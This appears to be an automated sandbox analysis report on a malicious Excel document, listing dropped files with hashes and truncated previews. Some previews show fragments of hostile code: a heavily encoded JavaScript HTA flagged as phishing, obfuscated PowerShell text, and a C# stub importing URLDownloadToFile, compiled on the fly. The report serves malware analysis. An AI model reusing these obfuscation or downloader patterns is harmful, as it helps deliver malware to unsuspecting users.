                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):147131
                                                                                            Entropy (8bit):2.492026622529777
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:3NTBeJFFFFFFp7gDyWjrtpyxxxxxxVzS:JDy
                                                                                            MD5:802CD36BAA47F7B2EFA27526316E696B
                                                                                            SHA1:8972C43DF7F45EAF0D8DBAC99841840578EF62F2
                                                                                            SHA-256:530DFDBC82FFF19C1B58C46576E23938620D4A057B94240215CB69A272EDA271
                                                                                            SHA-512:F725AD70E86494095473F31887940671A5C530E2652B8F9B7F57726F8B49DA75A14103E834D8E3C0B6BF9309BB062F723BB8A8930CFD3D66BBCE53F7564FD0A8
                                                                                            Malicious:false
                                                                                            Preview:Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):15189
                                                                                            Entropy (8bit):5.0343247648743
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                            MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                            SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                            SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                            SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):197887
                                                                                            Entropy (8bit):2.103619706221418
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:4owZw9d6yfaqcQ6PHO/3g9a8GPcQ6PHQ0/3g9a8GBGl/Qcj/WqgO7fpR1MK95tio:4LwzQcHgODpqPvQ
                                                                                            MD5:012B83177846CE35F8AE1F6B304FF9C6
                                                                                            SHA1:AE49E4E85D2FE80A83D0AA6420C72246E8B5E17E
                                                                                            SHA-256:264FC1A50A0F37A599E8CB50572D99A78C493DA4837930A480253E04A5963FA9
                                                                                            SHA-512:D48BDF9A62E410254CF3074D7215F922E98D6D1EE0C936FFF9C3720A000BDC571758E19A5338B7AD76F70B851AAC641A7EABA09B92782D5E57E4921E368D2978
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta, Author: Joe Security
                                                                                            Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%25253C%252553%252563%252552%252549%252550%252574%252520%252574%252559%252570%252565%2525

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme[1].tiff

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):153952
                                                                                            Entropy (8bit):3.8067197460998417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                            MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                            SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                            SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                            SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                            Malicious:false
                                                                                            Preview:...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\290A8C1.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1293620
                                                                                            Entropy (8bit):4.563127917199792
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                            MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                            Malicious:false
                                                                                            Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EF01AE6.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1293620
                                                                                            Entropy (8bit):4.563127917199792
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                            MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                            Malicious:false
                                                                                            Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F6E77CE.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1452584
                                                                                            Entropy (8bit):0.2563079623293435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Yal/m/4sHoKnL8n/Ml/+B0n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXl:Yemb2sZb
                                                                                            MD5:F4B0E1C03C7BB160B48CFFA6160E2CBA
                                                                                            SHA1:3B95941606219C0EAF5FDB78E67C7F10BF21390B
                                                                                            SHA-256:06FD47AFCD865FAAEEF47C91837DFE45A7F0EC9F67E233767F9A7386B00326F0
                                                                                            SHA-512:F44D02569287398C2F97F3FD0F302E58DAA66C646EAC3E05DE5CD6965A3F0E2C9A5446A89B237CE622FD5583937BE137E0FBD09E3ABF5FC7ADBE834CCF52A65F
                                                                                            Malicious:false
                                                                                            Preview:....l...........b................*...7.. EMF....(*..........................8...X....................?...........................................*...7..........c.......Q...l)..........b.......................c.......P...(...x....(...... ....*...7..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A24850C.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):109544
                                                                                            Entropy (8bit):4.282675970330063
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                                            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                                            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                                            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                                            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                                            Malicious:false
                                                                                            Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F09899D.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):44256
                                                                                            Entropy (8bit):3.15066292565687
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                                            MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                                            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                                            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                                            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                                            Malicious:false
                                                                                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D5F01AF.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1452584
                                                                                            Entropy (8bit):0.2562765619857971
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Yal/OGHWWmn/Ml/+f3n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W1f:YeOkQsoXb
                                                                                            MD5:467157C2656371305C0BE8EC47FDE4A2
                                                                                            SHA1:5BC781040C3F1BEC75F46D6626B7625BD82D194F
                                                                                            SHA-256:3959559289FDB01337D3762E3729ED49E765B3C0968F361097F39018E5F7F79B
                                                                                            SHA-512:BC10E03F7E0598FB8D37CAAC99AB1FC348D491A8C7633DA78D79DEA0A6FE64121C0B895B5168D00558B4EC16286C61FDE32378D4E83FACC59D63CF5F91F13F29
                                                                                            Malicious:false
                                                                                            Preview:....l...........b................;..kH.. EMF....(*..............................@................................................................;..kH..........c.......Q...l)..........b.......................c.......P...(...x....(...... ....;..kH..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF762977.emf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):44256
                                                                                            Entropy (8bit):3.147465798679962
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                                            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                                            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                                            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                                            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                                            Malicious:false
                                                                                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                            C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.0.cs

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                                            Category:dropped
                                                                                            Size (bytes):482
                                                                                            Entropy (8bit):3.72494092078817
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zusXXemMGtpjQXReKJ8SRHy4HHlkbZ/vNy:V/DTLDfurbXfHO3Ny
                                                                                            MD5:8C16810A9A149EE7B288951C6AFDFCD1
                                                                                            SHA1:4322374E8321E8A97AB6AF0B6A23BB3F016C9713
                                                                                            SHA-256:95C610A9E86321D9DEA63594D0D9C9CB72C5DC56EDF8F78F25736A76CAC0D949
                                                                                            SHA-512:0E37863619591FDD2CDE0AE8EAD71EF856695E299E9BB76266F1B40588D3F7E26521F7CB0BEDCFA2A0809224DC02B076D4A07A1D247B23ADB30E79CA5F626564
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace LUtJBV.{. public class gNw. {. [DllImport("urlMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr leaFQHyg,string Txt,string lMM,uint eMnvlHQop,IntPtr kfbeumR);.. }..}.

                                                                                            C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.353990064384824
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fqtgGzxs7+AEszIP23fqtgQA:p37Lvkmb6KzitfWZEoita
                                                                                            MD5:2D499B7EE9A50E529376682F5A91C32F
                                                                                            SHA1:6F446711CCACC4326C0D4621F9394C229B119251
                                                                                            SHA-256:883A6A7CF9CA00325315A245194863B1AA736461CD101E6A6F789A1C425C4CD4
                                                                                            SHA-512:968D289ECA640BC296FE09FAF550714C48684EF1DDC7E6763C636344FDB008F3C6E8C447D710E55609D723801239EA8E138DE884A302CDF40A6969471B9C1763
                                                                                            Malicious:false
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.835463387250883
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGSSPBG5eM7p8y7MfukhCa0v81b+PtkZfXh2WqhkWI+ycuZhNHakSpPNnq:6BsM+lfFCv8t+uJXh2WEH1ulHa3Lq
                                                                                            MD5:81D547B190CD6FF8AA154A0A8B815BB0
                                                                                            SHA1:B42FF870BA61C8C708EEE67D07A0BA6CC6C61176
                                                                                            SHA-256:4D78287F940F604D34D1523624A5F2FA23530E361BCF869D7BEB58D0A9060E0E
                                                                                            SHA-512:C233F74B2BB9BD2D06314EA7E07775F8A691355AA56BADCA805EDEF9D5950CF6BCD29594027BA688848012EF2CCB4B5C034ACDC6FAD10FAED1537910F0E4FF1F
                                                                                            Malicious:false
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.Wg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....t.....t.......................................... 9.....P ......K.........Q.....Z.....^.....b.....l...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.24

                                                                                            C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.out

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.388164162109802
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KzimEoiJKaMD5DqBVKVrdFAMBJTH:Akka60imEoiJKdDcVKdBJj
                                                                                            MD5:FC782DB2AA90D21AE783D38E56D68BD9
                                                                                            SHA1:F8192A5FB9911BF5F0F4308B36A9C8B2CA403446
                                                                                            SHA-256:FBE562DC34DDA022147DF467097BE60DD7D25FB66392D74D5F1A4A0817144B33
                                                                                            SHA-512:06961D40E41361C921B622C0214AA9EB63FC28C5C7F2D9629EB4947A839B1AF609F501ED98946CF890EA396BBA3F05756978E0EE8A1554242C847334572E8B83
                                                                                            Malicious:false
                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.126086307453168
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFak7YnqqpPN5Dlq5J:+RI+ycuZhNHakSpPNnqX
                                                                                            MD5:4F993638AAE51B2D5B8F55A31C6FA0B7
                                                                                            SHA1:BB267F36AEEA40DD3EB060A6BF14DD809B273ADC
                                                                                            SHA-256:4EA249812A5D24704F8BCB2A2765B35291A36DE459CE6B6F8409ACE4BFFD81B6
                                                                                            SHA-512:EB9FE09A0E148A39F1AA1B4F708572E53ED1CC81F65720151D22FC2A87F94765D6B33CCA49C302C1C66929FC4504572417B261686C25D6977B0C49D886A7D852
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.4.v.q.j.d.j.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.4.v.q.j.d.j.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                            C:\Users\user\AppData\Local\Temp\RES476D.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 10 05:57:54 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):3.997481387851723
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H0e9EurA619dHSwKdNWI+ycuZhNxakS/PNnqSqd:BrvrJKd41ulxa3dqSK
                                                                                            MD5:9EE959071671AA650AACD35C09DDDF02
                                                                                            SHA1:DB2E18D7F67DC6DD2455906FB9CE3C04D7E4FC69
                                                                                            SHA-256:B61FE550AC969F3A56C1738C2B534DC884E5D1DCDBF1F8BFC0749E0E9FE5601B
                                                                                            SHA-512:092661C928BC9AA3EAD99AD3F1E74BF3ECC270CC312683720A5B517DC790B7A9298702BF7486470B723A57D0012C28213267D885F4AAC8E7F0EB83E07787AEF6
                                                                                            Malicious:false
